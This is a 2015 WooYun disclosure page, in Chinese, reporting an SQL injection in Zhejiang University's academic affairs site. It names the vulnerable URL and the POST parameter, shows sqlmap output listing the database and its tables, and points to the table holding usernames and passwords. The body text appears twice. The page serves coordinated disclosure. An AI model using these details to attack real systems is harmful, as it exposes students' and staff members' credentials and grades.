当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125360

漏洞标题:浙江大学教务网又一SQL注入可拖库

相关厂商:浙江大学

漏洞作者: 来文

提交时间:2015-07-08 17:03

修复时间:2015-08-23 12:36

公开时间:2015-08-23 12:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-08: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开

简要描述:

浙江大学教务网是浙江大学的核心服务网,用户名、密码与校内各种服务挂钩(比如老师的邮箱密码,登录进去可以看到还没开考的考试试卷)。同时教务网也包含所有师生的全部信息,最重要的是,教务网上有成绩数据。注:改成绩会被开除!

详细说明:

登陆后,注入点出现在这个位置 http://jwbinfosys.zju.edu.cn/lw_xsxt.aspx 是毕业论文选题界面,可以搜索老师或者论文题目

1.jpg


问题就出在这个POST的TextBox1

TextBox1=search&Button2=+%C8%B7+%B6%A8+


跑sqlmap

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Oracle
available databases [1]:
[*] ZJDX


数据库居然叫ZJDX(浙江大学),不是ZJU么。。。
列表单,太慢了,跑了一半就没跑了

[INFO] fetching tables for database: 'ZJDX'
[INFO] fetching number of tables for database 'ZJDX'
resumed: ZZYKGB\x11
resumed: ZZYKZB
resumed: ZZYSQB
resumed: ZZYXSMDB
resumed: ZZYXSXQaMJGB
resumed: ZZYXSXQPMJGMXB
resumed: ZZYXSYSXXB
resumed: ZZYXYsZB
resumed: ZZYZYSZB
resumed: YDYTXMGSMDB
resumed: YHB
resumed: YHPYFAQXB
resumed: YHQXB\x02
resumed: YJBYMD
resumed: YJBYSMD\t
resumed: YJCXYB
resumed: YJSJBX\x04WB
resumed: YJSJDMB
resumed: YKDXXFB
resumed: YKZZ_2007_1031
resumed: YKZZ_2006_1031
resumed: XSKCYXXGSQB
resumed: PJ2008_JXJHH
resumed: BKZYFPB
resumed: DXKCB
resumed: SYXMLXDMB
resumed: SYXMXXB
resumed: SYZXDMB
resumed: SZaMDZB
resumed: SZaWB
resumed: TDKCSZB
resumed: TJKBAPQKB
resumed: TJKBAPQKLSB
resumed: TJKBDMB
resumed: TJMSGDYJSBZDMB
resumed: TJMSGDYJSQXDMB
resumed: TJMSGDYJSSQB
resumed: TJXSJFB
resumed: TJXXB
resumed: CJLYDMB


所有账户信息都在YHB里面,可以把XM(姓名) YHM(用户名) KL(口令)dump下来。

2.jpg


怕被开除,就没深入了。
反正得教务网者得天下

漏洞证明:

登陆后,注入点出现在这个位置 http://jwbinfosys.zju.edu.cn/lw_xsxt.aspx 是毕业论文选题界面,可以搜索老师或者论文题目

1.jpg


问题就出在这个POST

TextBox1=search&Button2=+%C8%B7+%B6%A8+


跑sqlmap

web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322
back-end DBMS: Oracle
available databases [1]:
[*] ZJDX


数据库居然叫ZJDX(浙江大学),不是ZJU么。。。
列表单,太慢了,跑了一半就没跑了

[INFO] fetching tables for database: 'ZJDX'
[INFO] fetching number of tables for database 'ZJDX'
resumed: ZZYKGB\x11
resumed: ZZYKZB
resumed: ZZYSQB
resumed: ZZYXSMDB
resumed: ZZYXSXQaMJGB
resumed: ZZYXSXQPMJGMXB
resumed: ZZYXSYSXXB
resumed: ZZYXYsZB
resumed: ZZYZYSZB
resumed: YDYTXMGSMDB
resumed: YHB
resumed: YHPYFAQXB
resumed: YHQXB\x02
resumed: YJBYMD
resumed: YJBYSMD\t
resumed: YJCXYB
resumed: YJSJBX\x04WB
resumed: YJSJDMB
resumed: YKDXXFB
resumed: YKZZ_2007_1031
resumed: YKZZ_2006_1031
resumed: XSKCYXXGSQB
resumed: PJ2008_JXJHH
resumed: BKZYFPB
resumed: DXKCB
resumed: SYXMLXDMB
resumed: SYXMXXB
resumed: SYZXDMB
resumed: SZaMDZB
resumed: SZaWB
resumed: TDKCSZB
resumed: TJKBAPQKB
resumed: TJKBAPQKLSB
resumed: TJKBDMB
resumed: TJMSGDYJSBZDMB
resumed: TJMSGDYJSQXDMB
resumed: TJMSGDYJSSQB
resumed: TJXSJFB
resumed: TJXXB
resumed: CJLYDMB


所有账户信息都在YHB里面,可以把XM(姓名) YHM(用户名) KL(口令)dump下来。

2.jpg


怕被开除,就没深入了。
反正得教务网者得天下

修复方案:

过滤

版权声明:转载请注明来源 来文@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-07-09 12:36

厂商回复:

正在通知相关学校处理

最新状态:

暂无


漏洞评价:

评论